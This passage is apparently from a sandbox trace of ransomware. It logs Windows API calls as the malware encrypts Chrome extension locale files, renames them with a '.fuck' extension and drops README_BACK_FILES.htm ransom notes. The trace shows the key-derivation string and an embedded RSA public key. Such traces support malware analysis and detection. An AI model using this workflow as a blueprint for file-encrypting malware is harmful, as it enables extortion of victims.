lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc6, lpOverlapped=0x0) returned 1 [0257.205] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0257.205] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0257.205] CloseHandle (hObject=0x5d5c) returned 1 [0257.205] CloseHandle (hObject=0x5d60) returned 1 [0257.205] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0257.207] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0257.208] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.gsg")) returned 1 [0257.209] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.fuck")) returned 1 [0257.210] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.210] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.210] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.210] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.210] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.210] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0257.210] AreFileApisANSI () returned 1 [0257.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.210] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.211] GetFileType (hFile=0x5d50) returned 0x1 [0257.211] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.212] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.212] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.212] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.212] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.212] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.212] GetLastError () returned 0x0 [0257.212] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json")) returned 0x20 [0257.212] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json", dwFileAttributes=0x80) returned 1 [0257.213] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.213] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.215] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.215] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.217] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.217] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.217] CryptHashData (hHash=0x2e18128, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.217] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.218] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.218] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.218] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16380) returned 1 [0257.218] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16380, dwCertEncodingType=0x1, pInfo=0x2e2b1b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b1e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b1e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19a68) returned 1 [0257.218] CryptEncrypt (in: hKey=0x2e19a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.218] CryptEncrypt (in: hKey=0x2e19a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15f40*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15f40*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e15f40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15f40*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.219] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x299, lpOverlapped=0x0) returned 1 [0257.232] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x299, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0257.232] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0257.253] CloseHandle (hObject=0x5d60) returned 1 [0257.253] CloseHandle (hObject=0x5d5c) returned 1 [0257.253] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json"), bFailIfExists=0) returned 1 [0257.256] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json", dwFileAttributes=0x0) returned 1 [0257.256] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.gsg")) returned 1 [0257.257] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\messages.json.fuck")) returned 1 [0257.258] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.258] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.258] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.258] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.258] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.258] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\readme_back_files.htm")) returned 0xffffffff [0257.258] AreFileApisANSI () returned 1 [0257.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.259] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.261] GetFileType (hFile=0x5d50) returned 0x1 [0257.261] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.262] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.262] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.263] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.263] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.263] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.263] GetLastError () returned 0x0 [0257.264] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json")) returned 0x20 [0257.264] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0257.264] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.265] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.265] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.266] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.268] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.268] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.268] CryptHashData (hHash=0x2e18128, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.268] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.268] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.268] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.268] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e15d20) returned 1 [0257.268] CryptImportPublicKeyInfo (in: hCryptProv=0x2e15d20, dwCertEncodingType=0x1, pInfo=0x2e2b280*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b2b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b2b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19d68) returned 1 [0257.268] CryptEncrypt (in: hKey=0x2e19d68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.268] CryptEncrypt (in: hKey=0x2e19d68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e162f8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e162f8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.268] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e162f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e162f8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.269] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xbb, lpOverlapped=0x0) returned 1 [0257.270] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xbb, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.270] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.270] CloseHandle (hObject=0x5d5c) returned 1 [0257.270] CloseHandle (hObject=0x5d60) returned 1 [0257.270] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0257.273] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0257.274] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.gsg")) returned 1 [0257.275] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\messages.json.fuck")) returned 1 [0257.276] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.276] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.276] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.276] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.276] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.276] GetFileAttributesA 